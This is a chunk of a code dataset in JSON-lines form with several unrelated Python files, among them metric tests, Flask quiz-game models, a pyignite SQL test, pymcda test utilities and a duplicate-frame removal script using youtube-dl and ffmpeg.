2, 3])\n weight = torch.ones(targets.size())\n ignore_index = 0\n ppl = Perplexity(weight, ignore_index)\n\n loss1 = ppl(inputs, targets, return_metric=True)\n\n inputs = torch.tensor(\n [[1.0, 0, 0, 0], [0, 1.0, 0, 0], [0, 1.0, 0, 0], [0, 0, 1.0, 0]]\n )\n\n loss2 = ppl(inputs, targets, return_metric=True)\n\n self.assertTrue(loss1 < loss2)\n\n def test_fbeta(self):\n inputs = torch.tensor(\n [[1.0, 0, 0, 0], [0, 1.0, 0, 0], [0, 0, 1.0, 0], [0, 0, 0, 1.0]]\n )\n targets = torch.tensor([0, 1, 2, 3])\n\n fbeta = FBeta(1)\n\n loss1 = fbeta(inputs, targets, return_metric=True)\n\n inputs = torch.tensor(\n [[0, 0, 0, 1.0], [1.0, 0, 0, 0], [1.0, 0, 0, 0], [1.0, 0, 0, 0]]\n )\n\n loss2 = fbeta(inputs, targets, return_metric=True)\n\n self.assertTrue(loss1[\"fscore\"] > loss2[\"fscore\"])\n\n def test_f1(self):\n inputs = 
torch.tensor(\n [[1.0, 0, 0, 0], [0, 1.0, 0, 0], [0, 0, 1.0, 0], [0, 0, 0, 1.0]]\n )\n targets = torch.tensor([0, 1, 2, 3])\n\n f1 = F1(0)\n\n _, _, fs1 = f1(inputs, targets, return_metric=True)\n\n inputs = torch.tensor(\n [[0, 0, 0, 1.0], [1.0, 0, 0, 0], [1.0, 0, 0, 0], [1.0, 0, 0, 0]]\n )\n\n _, _, fs2 = f1(inputs, targets, return_metric=True)\n\n self.assertTrue(fs1 > fs2)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_metric.py","file_name":"test_metric.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"611895865","text":"__version__ = \"1.0dev\"\n\n# chambers of congress\n\nHOUSE = 1\nSENATE = 2\n\nCHAMBERS = {\n 'H': HOUSE,\n 'S': SENATE,\n}\n\n# political parties\n\nDEMOCRAT = 1\nREPUBLICAN = 2\nINDEPENDENT = 3\n\nPARTIES = {\n 'D': DEMOCRAT,\n 'R': REPUBLICAN,\n 'I': INDEPENDENT,\n}\n\n__all__ = [\n 'CHAMBERS', 'HOUSE', 'SENATE',\n 'PARTIES', 'DEMOCRAT', 'REPUBLICAN', 'INDEPENDENT',\n]","sub_path":"citizendialer3000/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"381479215","text":"import datetime\nfrom flask_sqlalchemy import SQLAlchemy\nfrom app import db\n# db = SQLAlchemy()\n\n# User==================================================\nclass Users(db.Model):\n __tablename__ = 'users'\n\n user_id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String())\n password = db.Column(db.String())\n email = db.Column(db.String())\n quiz = db.relationship('Quizzes', cascade='all,delete', backref='users', lazy=True)\n \n\n def __init__(self, username, password, email):\n self.username = username\n self.password = password\n self. 
email = email\n\n def __repr__(self):\n return '<user id {}>'.format(self.user_id)\n \n def serialize(self):\n return{\n 'user_id': self.user_id,\n 'username': self.username,\n 'password': self.password,\n 'email': self.email,\n 'quiz' : [{'quiz_name':item.quiz_name, 'quiz_category':item.quiz_category } for item in self.quiz]\n }\n# =========================================================\n\n# Quizzes =================================================\nclass Quizzes(db.Model):\n __tablename__ = 'quizzes'\n\n quiz_id = db.Column(db.Integer, primary_key=True)\n creator_id = db.Column(db.Integer, db.ForeignKey('users.user_id'), nullable=False)\n quiz_name = db.Column(db.String())\n quiz_category = db.Column(db.String())\n questions = db.relationship('Questions',cascade='all,delete', backref='quizzes', lazy=True) \n\n def __init__(self, creator_id, quiz_name, quiz_category):\n self.creator_id = creator_id\n self.quiz_name = quiz_name\n self.quiz_category = quiz_category\n \n def __repr__(self):\n return'<quiz id {}>'.format(self.quiz_id)\n \n def serialize(self):\n return{\n 'quiz_id' : self.quiz_id,\n 'creator_id' : self.creator_id,\n 'quiz_name' : self.quiz_name,\n 'quiz_category' : self.quiz_category,\n # 'question_list' : [{'answer':item.answer, 'question':item.question, 'question_number':item.question_number} for item in self.question_list]\n }\n# ==========================================================\n# Questions ================================================\nclass Questions(db.Model):\n __tablename__ = \"questions\"\n\n question_id = db.Column(db.Integer, primary_key=True)\n quiz_id = db.Column(db.Integer, db.ForeignKey('quizzes.quiz_id'), nullable=False)\n question_number = db.Column(db.Integer())\n question = db.Column(db.String())\n answer = db.Column(db.String())\n option_list = db.relationship('OptionList', cascade='all,delete', backref='questions', lazy=True)\n\n def __init__(self, question_id, quiz_id, question_number, question, answer):\n \n self.question_id = question_id\n self.quiz_id = quiz_id\n self.question_number = question_number\n self.question = question\n self.answer = answer\n \n def __repr__(self):\n return'<question id {}>'.format(self.question_id)\n\n def serialize(self):\n return{\n # 'question_id' : self.question_id,\n 'quiz_id' : self.quiz_id,\n 'question_id' : self.question_id,\n 'question_number' : self.question_number,\n 'question' : self.question,\n 'answer' : self.answer,\n 'option_list' : [{'a':item.a, 'b':item.b, 'c':item.c, 'd':item.d, 'question_id': item.question_id } for item in self.option_list]\n }\n\n# Options List ==============================================\nclass OptionList(db.Model):\n __tablename__ = \"option_list\"\n\n option_id = db.Column(db.Integer, primary_key=True)\n question_id = db.Column(db.Integer,db.ForeignKey('questions.question_id'), nullable=False)\n a = db.Column(db.String())\n b = db.Column(db.String())\n c = db.Column(db.String())\n d = db.Column(db.String())\n\n def __init__(self, option_id, question_id, a, b, c, d):\n self.option_id = option_id\n self.question_id = question_id\n self.a = a\n self.b = b\n self.c = c\n self.d = d\n \n def __repr__(self):\n return'<option id {}>'.format(self.option_id)\n\n def serialize(self):\n return {\n 'option_id' : self.option_id,\n 'question_id' : self.question_id,\n 'a' : self.a,\n 'b' : self.b,\n 'c' : self.c,\n 'd' : self.d\n }\n# ===========================================================\n\n# Game =====================================================\nclass Game(db.Model):\n 
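'''One running game session per PIN, pointing at the quiz being played.'''\n 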
__tablename__ = 'game'\n\n game_pin = db.Column(db.Integer, primary_key=True)\n quiz_id = db.Column(db.Integer, db.ForeignKey('quizzes.quiz_id'), nullable=False)\n quizzes = db.relationship('Quizzes', cascade='all,delete', backref='game', lazy=True)\n\n \n\n def __init__(self, game_pin, quiz_id):\n self.game_pin = game_pin\n self.quiz_id = quiz_id\n\n def __repr__(self):\n return'<game pin {}>'.format(self.game_pin)\n\n def serialize(self):\n return {\n 'game_pin' : self.game_pin,\n 'quiz_id' : self.quiz_id,\n # 'quiz' : [{'quiz_name':item.quiz_name, 'quiz_category':item.quiz_category } for item in self.quiz]\n }\n\n# Leaderboard =================================================\nclass Leaderboard(db.Model):\n __tablename__ = \"leaderboard\"\n game_pin = db.Column(db.Integer())\n score = db.Column(db.Integer())\n player_name = db.Column(db.String, primary_key=True)\n\n def __init__(self, game_pin, score, player_name):\n self.game_pin = game_pin\n self.score = score\n self.player_name = player_name\n\n def __repr__(self):\n return'<player name {}>'.format(self.player_name)\n\n def serialize(self):\n return {\n 'game_pin' : self.game_pin,\n 'score' : self.score,\n 'player_name' : self.player_name\n } ","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"638129446","text":"# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. 
You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom collections import OrderedDict\nfrom enum import Enum\n\nimport pytest\n\nfrom pyignite import GenericObjectMeta, AioClient\nfrom pyignite.datatypes import IntObject, String\n\n\nclass StudentKey(\n metaclass=GenericObjectMeta,\n type_name='test.model.StudentKey',\n schema=OrderedDict([\n ('ID', IntObject),\n ('DEPT', String)\n ])\n):\n pass\n\n\nclass Student(\n metaclass=GenericObjectMeta,\n type_name='test.model.Student',\n schema=OrderedDict([\n ('NAME', String),\n ])\n):\n pass\n\n\ncreate_query = '''CREATE TABLE StudentTable (\n id INT(11),\n dept VARCHAR,\n name CHAR(24),\n PRIMARY KEY (id, dept))\n WITH \"CACHE_NAME=StudentCache, KEY_TYPE=test.model.StudentKey, VALUE_TYPE=test.model.Student\"'''\n\ninsert_query = '''INSERT INTO StudentTable (id, dept, name) VALUES (?, ?, ?)'''\n\nselect_query = 'SELECT id, dept, name FROM StudentTable'\n\nselect_kv_query = 'SELECT _key, _val FROM StudentTable'\n\ndrop_query = 'DROP TABLE StudentTable IF EXISTS'\n\n\n@pytest.fixture\ndef student_table_fixture(client):\n yield from __create_student_table_fixture(client)\n\n\n@pytest.fixture\nasync def async_student_table_fixture(async_client):\n async for _ in __create_student_table_fixture(async_client):\n yield\n\n\ndef __create_student_table_fixture(client):\n def inner():\n client.sql(drop_query)\n client.sql(create_query)\n yield None\n client.sql(drop_query)\n\n async def inner_async():\n await client.sql(drop_query)\n await client.sql(create_query)\n yield None\n await client.sql(drop_query)\n\n return inner_async() if isinstance(client, AioClient) else inner()\n\n\nclass InsertMode(Enum):\n SQL = 1\n CACHE = 2\n\n\n@pytest.mark.parametrize('insert_mode', [InsertMode.SQL, InsertMode.CACHE])\ndef test_sql_composite_key(client, insert_mode, student_table_fixture):\n __perform_test(client, insert_mode)\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize('insert_mode', [InsertMode.SQL, InsertMode.CACHE])\nasync def test_sql_composite_key_async(async_client, insert_mode, async_student_table_fixture):\n await __perform_test(async_client, insert_mode)\n\n\ndef __perform_test(client, insert=InsertMode.SQL):\n student_key = StudentKey(2, 'Business')\n student_val = Student('Abe')\n\n def validate_query_result(key, val, query_result):\n \"\"\"\n Compare query result with expected key and value.\n \"\"\"\n assert len(query_result) == 2\n sql_row = dict(zip(query_result[0], query_result[1]))\n\n assert sql_row['ID'] == key.ID\n assert sql_row['DEPT'] == key.DEPT\n assert sql_row['NAME'] == val.NAME\n\n def validate_kv_query_result(key, val, query_result):\n \"\"\"\n Compare query result with expected key and value.\n \"\"\"\n assert len(query_result) == 2\n sql_row = dict(zip(query_result[0], query_result[1]))\n\n sql_key, sql_val = sql_row['_KEY'], sql_row['_VAL']\n assert sql_key.ID == key.ID\n assert sql_key.DEPT == key.DEPT\n assert sql_val.NAME == val.NAME\n\n def inner():\n if insert == InsertMode.SQL:\n result = client.sql(insert_query, query_args=[student_key.ID, student_key.DEPT, student_val.NAME])\n assert next(result)[0] == 1\n else:\n studentCache = 
client.get_cache('StudentCache')\n studentCache.put(student_key, student_val)\n val = studentCache.get(student_key)\n assert val is not None\n assert val.NAME == student_val.NAME\n\n query_result = list(client.sql(select_query, include_field_names=True))\n validate_query_result(student_key, student_val, query_result)\n\n query_result = list(client.sql(select_kv_query, include_field_names=True))\n validate_kv_query_result(student_key, student_val, query_result)\n\n async def inner_async():\n if insert == InsertMode.SQL:\n result = await client.sql(insert_query, query_args=[student_key.ID, student_key.DEPT, student_val.NAME])\n assert (await result.__anext__())[0] == 1\n else:\n studentCache = await client.get_cache('StudentCache')\n await studentCache.put(student_key, student_val)\n val = await studentCache.get(student_key)\n assert val is not None\n assert val.NAME == student_val.NAME\n\n async with client.sql(select_query, include_field_names=True) as cursor:\n query_result = [r async for r in cursor]\n validate_query_result(student_key, student_val, query_result)\n\n async with client.sql(select_kv_query, include_field_names=True) as cursor:\n query_result = [r async for r in cursor]\n validate_kv_query_result(student_key, student_val, query_result)\n\n return inner_async() if isinstance(client, AioClient) else inner()\n","sub_path":"tests/common/test_sql_composite_key.py","file_name":"test_sql_composite_key.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"143637345","text":"import os\n\n\ndef count_sard_folders(imagepath):\n counter = 0\n dirname = os.path.dirname(imagepath)\n for item in os.listdir(dirname):\n if os.path.isdir(os.path.join(dirname, item)):\n if item.startswith('SARD'):\n counter += 1\n return counter\n\n\nclass FailedToRename(Exception):\n pass\n\n\ndef rename_sard_folder(imagepath):\n dirname = os.path.dirname(imagepath)\n sardfolder = os.path.join(dirname, 'SARD')\n if not os.path.exists(sardfolder):\n return False\n newsardfolder = os.path.join(dirname, 'SARD.old')\n if os.path.exists(newsardfolder):\n def nextFolder(newsardfolder):\n for x in range(2, 20):\n if not os.path.exists(newsardfolder+str(x)):\n return newsardfolder+str(x)\n raise FailedToRename(newsardfolder)\n newsardfolder = nextFolder(newsardfolder)\n os.rename(sardfolder, newsardfolder)\n return True\n","sub_path":"sard-admin/sardadmin/folders.py","file_name":"folders.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"29917879","text":"AUTHOR = 'Zachary Priddy. 
(me@zpriddy.com)'\nTITLE = 'Door Alert'\nMETADATA = {\n 'title': TITLE,\n 'author': AUTHOR,\n 'commands': ['start', 'stop'],\n 'interface': {\n 'devices': {\n \"contact_sensors\": {\n 'context': 'Doors/Windows that will trigger the alert.',\n 'type': 'deviceList',\n 'filter': {\n 'request': ['contact']\n }\n },\n \"lights\": {\n 'context': 'Lights that will flash.',\n 'type': 'deviceList',\n 'filter': {\n 'request': ['light']\n }\n }\n },\n 'triggers': {\n 'initial': {\n 'context': 'THIS IS AUTO GENERATED'\n },\n 'delayed': {\n 'context': 'THIS IS AUTO GENERATED'\n }\n },\n 'messages': {\n \"initial\": {\n 'context': 'Message to send when alert is started.',\n 'type': 'string'\n },\n \"delayed\": {\n 'context': 'Message to send when alert is stopped.',\n 'type': 'string'\n }\n },\n 'delays': {\n 'initial': {\n 'context': 'Time to delay after door opens before triggering alert. (seconds)',\n 'type': 'number'\n }\n }\n }\n}\n","sub_path":"Firefly/automation/door_alert/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"288748404","text":"from __future__ import print_function\nfrom __future__ import division\nimport bz2\nimport csv\nimport os\nimport sys\nimport time\nimport traceback\nfrom collections import OrderedDict\nfrom copy import deepcopy\nfrom itertools import product\nfrom xml.etree import ElementTree\n#sys.path.append(\"/Users/pegdwendeminoungou/Python_workplace/pymcda-master/pymcda/..\")\nsys.path.append(\"/home/pegdwende/oso-pymcda-external-server/pymcda/..\")\nfrom pymcda.types import Alternatives, Criteria, PerformanceTable\nfrom pymcda.types import AlternativesAssignments, Categories\n\nclass test_result():\n\n def __init__(self, test_name):\n self.test_name = test_name\n self.attributes = []\n self.attributes_size = {}\n\n def __getitem__(self, name):\n return getattr(self, name)\n\n def __setitem__(self, name, value):\n if name not in self.attributes:\n self.attributes.append(name)\n\n if type(value) == list:\n self.attributes_size[name] = len(value)\n else:\n self.attributes_size[name] = 1\n\n setattr(self, name, value)\n\n def __repr__(self):\n return self.test_name\n\n def set_attributes_order(self, order):\n self.attributes = set(order).union(set(self.attributes))\n\n def get_attributes(self):\n return self.attributes\n\n def get_attributes_size(self):\n return self.attributes_size\n\n def get_header(self):\n header = []\n for attr in self.attributes:\n size = self.attributes_size[attr]\n if size > 1:\n header += [ attr + \"%d\" % i for i in range(size) ]\n else:\n header += [ attr ]\n\n return header\n\n def tocsv(self, writer, fields = None):\n if fields is None:\n fields = self.get_attributes()\n\n row = []\n for field in fields:\n if type(self[field]) == list:\n for val in self[field]:\n row += [ val ]\n else:\n row += [ self[field] ]\n\n writer.writerow(row)\n\nclass test_results(list):\n\n def get(self, name, val):\n l = test_results()\n for tr in self:\n if tr[name] != val:\n continue\n\n l.append(tr)\n\n return l\n\n def unique(self, field):\n unique_values = []\n for tr in self:\n value = tr[field]\n if value not in unique_values:\n unique_values.append(value)\n\n return unique_values\n\n def set_attributes_order(self, order):\n for tr in self:\n tr.set_attributes_order(order)\n\n def summary(self, unique_fields, average_fields, min_fields = None,\n max_fields = None, std_fields = None):\n if min_fields is None:\n min_fields = 
average_fields\n if max_fields is None:\n max_fields = average_fields\n if std_fields is None:\n std_fields = average_fields\n\n # Research uniques values for each field\n unique_values = {}\n for uf in unique_fields:\n unique_values[uf] = self.unique(uf)\n\n # For each combination perform the average, min and max\n trs = test_results()\n\n attributes_size = self[0].get_attributes_size()\n keys = unique_values.keys()\n for indices in product(*unique_values.values()):\n tr = test_result(None)\n\n params = dict(zip(keys, indices))\n l = self\n for k in unique_fields:\n l = l.get(k, params[k])\n tr[k] = params[k]\n\n if len(l) == 0:\n continue\n\n tr[\"#\"] = len(l)\n\n for af in average_fields:\n if attributes_size[af] > 1:\n v = zip(*(r[af] for r in l))\n avg_values = [ sum(x) / len(x) for x in v ]\n for i, val in enumerate(avg_values):\n tr[\"%s%d_avg\" % (af, i)] = val\n\n if af in std_fields:\n std_values = [(1 / len(x) *\n sum((xi - sum(x) / len(x)) ** 2\n for xi in x)\n ) ** 0.5\n for x in v]\n for i, val in enumerate(std_values):\n tr[\"%s%d_std\" % (af, i)] = val\n\n if af in min_fields:\n min_values = [ min(x) for x in v ]\n for i, val in enumerate(min_values):\n tr[\"%s%d_min\" % (af, i)] = val\n\n if af in max_fields:\n max_values = [ max(x) for x in v ]\n for i, val in enumerate(max_values):\n tr[\"%s%d_max\" % (af, i)] = val\n else:\n v = [ r[af] for r in l ]\n tr[\"%s_avg\" % af] = sum(v) / len(v)\n\n if af in std_fields:\n tr[\"%s_std\" % af] = (1 / len(v) *\n sum((xi - sum(v) / len(v)) ** 2\n for xi in v)) ** 0.5\n if af in min_fields:\n tr[\"%s_min\" % af] = min(v)\n if af in max_fields:\n tr[\"%s_max\" % af] = max(v)\n\n trs.append(tr)\n\n return trs\n\n def summary_columns(self, unique_fields, column_fields, column_key):\n # Research uniques values for each field\n unique_values = {}\n for uf in unique_fields:\n unique_values[uf] = self.unique(uf)\n\n # For each combination perform the average, min and max\n trs = test_results()\n\n attributes_size = self[0].get_attributes_size()\n keys = unique_values.keys()\n for indices in product(*unique_values.values()):\n tr_unique = test_result(indices)\n\n params = dict(zip(keys, indices))\n l = self\n for k in unique_fields:\n l = l.get(k, params[k])\n tr_unique[k] = params[k]\n\n nrows = attributes_size[column_fields[0]]\n for i in range(nrows):\n tr = deepcopy(tr_unique)\n for cf in column_fields:\n tr[\"#%s\" % cf] = i\n\n col = []\n for t in l:\n suffix = t[column_key]\n tr[\"%s_%s\" % (cf, suffix)] = t[cf][i]\n col += [ t[cf][i] ]\n\n avg_value = sum(col) / len(col)\n min_value = min(col)\n max_value = max(col)\n std_value = (1 / len(col) * sum((xi - avg_value) ** 2\n for xi in col)) ** 0.5\n\n tr[\"%s_avg\" % cf] = avg_value\n tr[\"%s_std\" % cf] = std_value\n tr[\"%s_min\" % cf] = min_value\n tr[\"%s_max\" % cf] = max_value\n\n trs.append(tr)\n\n return trs\n\n def tocsv(self, writer, fields = None):\n if fields is None:\n fields = self[0].get_attributes()\n writer.writerow(fields)\n for tr in self:\n tr.tocsv(writer, fields)\n\n#following from Python cookbook, #475186\ndef has_colours(stream):\n if not hasattr(stream, \"isatty\"):\n return False\n if not stream.isatty():\n return False # auto color only on TTYs\n try:\n import curses\n curses.setupterm()\n return curses.tigetnum(\"colors\") > 2\n except:\n # guess false in case of error\n return False\nhas_colours = has_colours(sys.stdout)\n\ndef printc(*args):\n if has_colours:\n print(\"\\033[93m\", end = '')\n print(*args, end = \"\\033[0m\\n\" )\n else:\n 
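# no colour support on this terminal: fall back to plain output\n 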
print(*args)\n\nclass test_list():\n\n def __init__(self, classes_list = None):\n self.test_list = dict()\n if classes_list:\n for c in classes_list:\n self.get(c)\n\n def get(self, object):\n i = len(self.test_list)\n name_list = dir(object)\n for name in name_list:\n if not name.startswith('test'):\n continue\n\n method = getattr(object, name)\n i += 1\n\n self.test_list[i] = dict()\n self.test_list[i]['name'] = name\n self.test_list[i]['method'] = method\n self.test_list[i]['desc'] = method.__doc__\n\n def show(self, ids = None):\n for test in self.test_list:\n if ids and test not in ids:\n continue\n\n printc(\"* %3d. %s\" % (test, self.test_list[test]['name']))\n\n def run(self, ids = None):\n printc(\"* Tests to be run:\");\n if ids is None:\n ids = [ i for i in range(1, len(self.test_list)+1) ]\n self.show(ids)\n\n for id in ids:\n if id not in self.test_list:\n printc(\"* Test id %s not found!\" % id)\n continue\n\n printc(\"* Running %s...\" % self.test_list[id]['name'])\n if self.test_list[id]['desc']:\n printc(\"* Description: %s\" % self.test_list[id]['desc'])\n\n try:\n t1 = time.time()\n self.test_list[id]['method']()\n t2 = time.time()\n printc(\"* %s done! (after %f seconds)\" %\n (self.test_list[id]['name'], t2-t1))\n except:\n printc(\"* %s error\" % (self.test_list[id]['name']))\n traceback.print_exc(file=sys.stderr)\n\nclass test_list_example():\n\n def a(self):\n pass\n\n def test001_test_a(self):\n \"\"\"Just print coucou\"\"\"\n print('coucou!')\n\n def test002_b(self):\n print('beuh!')\n time.sleep(2)\n\ndef test_init(l = []):\n from optparse import OptionParser\n\n parser = OptionParser(usage = \"-t <test_ids>\")\n parser.add_option(\"-l\", \"--list\", action=\"store_true\", dest=\"show\",\n help = \"show list of tests\")\n parser.add_option(\"-t\", \"--tests\", dest = \"tests\", default=\"all\",\n help = \"run tests ids (all = All tests;\" \\\n \"ask = Display list and ask)\",\n metavar = \"test_ids\")\n\n (options, args) = parser.parse_args()\n\n tests = test_list(l)\n\n if options.show is True:\n tests.show()\n\n if options.tests == 'all':\n tests.run()\n elif options.tests == 'ask':\n tests.show()\n to_run = input(\"Which test(s) should be run? \")\n if type(to_run) == int:\n to_run = [ to_run ]\n elif type(to_run) != tuple:\n print('Invalid input');\n exit(1)\n tests.run(to_run)\n elif options.tests == 'none':\n pass\n else:\n tests.run()\n\ndef read_single_integer(variable, question):\n while not variable:\n variable = input(question + \" ? \")\n variable = int(variable)\n return variable\n\ndef read_multiple_integer(variable, question):\n while not variable:\n variable = input(question + \" ? \")\n variable = variable.split(\",\")\n variable = [int(x) for x in variable]\n return variable\n\ndef read_multiple_float(variable, question):\n while not variable:\n variable = input(question + \" ? \")\n variable = variable.split(\",\")\n variable = [float(x) for x in variable]\n return variable\n\ndef read_csv_filename(variable, default):\n while not variable:\n variable = input(\"File to save CSV data [%s] ? 
\" % default)\n if not variable:\n variable = default\n\n if variable[-4:] != \".csv\":\n variable += \".csv\"\n\n return variable\n\ndef parser_parse_options(*options):\n\n if \"na\" in options:\n parser.add_option(\"-n\", \"--na\", action = \"store\", type=\"string\",\n dest = \"na\",\n help = \"number of assignment examples\")\n\n if \"nc\" in options:\n parser.add_option(\"-c\", \"--nc\", action = \"store\", type=\"string\",\n dest = \"nc\",\n help = \"number of criteria\")\n\n if \"ncat\" in options:\n parser.add_option(\"-t\", \"--ncat\", action = \"store\", type=\"string\",\n dest = \"ncat\",\n help = \"number of categories\")\n\n if \"na_gen\" in options:\n parser.add_option(\"-g\", \"--na_gen\", action = \"store\", type=\"string\",\n dest = \"na_gen\",\n help = \"number of generalization alternatives\")\n\n if \"pcerrors\" in options:\n parser.add_option(\"-e\", \"--errors\", action = \"store\", type=\"string\",\n dest = \"pcerrors\",\n help = \"percentage of errors in the learning set\")\n\n if \"nseeds\" in options:\n parser.add_option(\"-s\", \"--nseeds\", action = \"store\", type=\"string\",\n dest = \"nseeds\",\n help = \"number of seeds\")\n\n if \"max_loops\" in options:\n parser.add_option(\"-l\", \"--max-loops\", action = \"store\",\n type = \"string\", dest = \"max_loops\",\n help = \"max number of loops for the \" \\\n \"metaheuristic \" \\\n \"used to find the profiles\")\n\n if \"nmodels\" in options:\n parser.add_option(\"-m\", \"--nmodels\", action = \"store\",\n type = \"string\", dest = \"nmodels\",\n help = \"Size of the population (of models)\")\n\n if \"max_oloops\" in options:\n parser.add_option(\"-o\", \"--max_oloops\", action = \"store\",\n type = \"string\", dest = \"max_oloops\",\n help = \"Max number of loops of the whole \" \\\n \"metaheuristic\")\n\n if \"filename\" in options:\n parser.add_option(\"-f\", \"--filename\", action = \"store\",\n type = \"string\", dest = \"filename\",\n help = \"filename to save csv output\")\n\nclass dataset(object):\n\n def __init__(self, name):\n self.name = name\n\n def is_complete(self):\n for obj in self.__dict__:\n if obj is None:\n return False\n return True\n\ndef load_mcda_data(csvfile, obj, *field):\n csvfile.seek(0)\n csvreader = csv.reader(csvfile, delimiter = \",\")\n try:\n obj = obj(OrderedDict({})).from_csv(csvreader, *field)\n except:\n print(\"Cannot get %s\" % obj())\n return None\n\n return obj\n\ndef load_mcda_input_data(filepath):\n\n try:\n csvfile = open(filepath, 'r')\n csvreader = csv.reader(csvfile, delimiter = \",\")\n except:\n print(\"Cannot open file '%s'\" % filepath)\n return None\n\n \n data = dataset(os.path.basename(filepath))\n data.a = load_mcda_data(csvfile, Alternatives, \"pt\")\n data.c = load_mcda_data(csvfile, Criteria, \"criterion\", None, None,\n 'direction')\n data.pt = load_mcda_data(csvfile, PerformanceTable, \"pt\",\n [c.id for c in data.c])\n \n # import pdb; pdb.set_trace()\n data.pt.round()\n data.aa = load_mcda_data(csvfile, AlternativesAssignments,\n \"pt\", \"assignment\")\n data.cats = load_mcda_data(csvfile, Categories, \"category\",\n None, \"rank\")\n\n if data.is_complete() is False:\n return None\n\n return data\n\n\ndef load_mcda_input_data_paper3(filepath):\n #print(filepath)\n try:\n csvfile = open(filepath, 'r')\n csvreader = csv.reader(csvfile, delimiter = \",\")\n except:\n print(\"Cannot open file '%s'\" % filepath)\n return None\n\n \n data = dataset(os.path.basename(filepath))\n data.a = load_mcda_data(csvfile, Alternatives, \"pt\")\n data.c = 
load_mcda_data(csvfile, Criteria, \"criterion\", None, None,\n 'direction')\n #import pdb; pdb.set_trace()\n data.pt = load_mcda_data(csvfile, PerformanceTable, \"pt\",\n [\"c1\",\"c2\",\"c3\",\"c4\",\"c5\",\"c6\",\"c7\"])\n \n \n data.pt.round()\n data.aa = load_mcda_data(csvfile, AlternativesAssignments,\n \"pt\", \"assignment\")\n #import pdb; pdb.set_trace()\n data.cats = load_mcda_data(csvfile, Categories, \"category\",\n None, \"rank\")\n \n if data.is_complete() is False:\n return None\n\n return data\n\n \n\ndef process_time():\n return sum(os.times()[0:-1])\n\nif __name__ == \"__main__\":\n a = test_list_example()\n tests = test_list([a])\n tests.show()\n try:\n to_run = input(\"Which one(s)? \")\n except:\n print('Invalid input!')\n exit(1)\n\n if type(to_run) == int:\n to_run = [ to_run ]\n elif type(to_run) != tuple:\n print('Invalid input');\n exit(1)\n\n tests.run(to_run)\n\nXMCDA_URL = 'http://www.decision-deck.org/2009/XMCDA-2.1.0'\n\ndef save_to_xmcda(filepath, *elems):\n #import pdb;pdb.set_trace()\n f = bz2.BZ2File(filepath, \"w\")\n xmcda = ElementTree.Element(\"{%s}XMCDA\" % XMCDA_URL)\n\n for elem in elems:\n xmcda.append(elem.to_xmcda())\n\n buf = ElementTree.tostring(xmcda, encoding=\"UTF-8\", method=\"xml\")\n f.write(buf)\n f.close()\n\ndef get_file_compression(filepath):\n magic_dict = {\n \"\\x1f\\x8b\\x08\": \"gz\",\n \"\\x42\\x5a\\x68\": \"bz2\",\n \"\\x50\\x4b\\x03\\x04\": \"zip\"\n }\n\n max_len = max(len(x) for x in magic_dict)\n\n with open(filepath) as f:\n file_start = f.read(max_len)\n\n for magic, filetype in magic_dict.items():\n if file_start.startswith(magic):\n return filetype\n\n return \"none\"\n\ndef is_bz2_file(filepath):\n if get_file_compression(filepath) == 'bz2':\n return True\n\n return False\n","sub_path":"test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":17787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"480757116","text":"#WOEFULLY INCOMPLETE\n\n#!/usr/bin/env python\n#\n# remove-duplicates.py: deletes files which have duplicate size\n# and md5sum\n#\n# by dpt\n#\n\n# source: http://www.davespace.co.uk/python/remove-duplicates.html\n# updated for python3\n\nimport os\n\n# download video\nos.system('youtube-dl \"https://www.youtube.com/watch?v=m6nUdoP6894\"')\nos.system(\"ffmpeg -i 'r4e.mp4' -vf mpdecimate,setpts=N/FRAME_RATE/TB 'r4e2.mp4'\")\n\n# get frames\nos.system(\"ffmpeg -i 'r4e.mp4' -f image2 'frames/video-frame%05d.png'\")\n\nimport hashlib\nimport os\nimport stat\nimport sys\n\nIgnore = ('Thumbs.db',)\n\ndef getmd5(filename):\n m = hashlib.md5()\n with open(filename, 'rb') as f:\n f2 = f.read()\n m.update(f2)\n return m.hexdigest()\n\ndef usage():\n sys.exit(1)\n\ndef main(argv):\n if len(argv) < 1:\n usage()\n\n dir = os.path.abspath(argv[0])\n\n # Create a dictionary keyed by size, with each entry holding a list of\n # filenames of that size.\n\n data = {}\n\n for root, dirs, files in os.walk(dir):\n for name in files:\n if name in Ignore: continue\n path = os.path.join(root, name)\n size = os.path.getsize(path)\n if not size in data:\n data[size] = []\n\n data[size].append(path)\n\n # For each key, checksum each list entry and compare.\n\n removed = 0\n\n for k in data.keys():\n dk = data[k]\n if len(dk) > 1:\n s = {}\n for j in dk:\n su = getmd5(j)\n if su in s:\n try:\n os.remove(j)\n removed += 1\n except:\n pass\n else:\n s[su] = j\n\n print('Done, %d files removed.' 
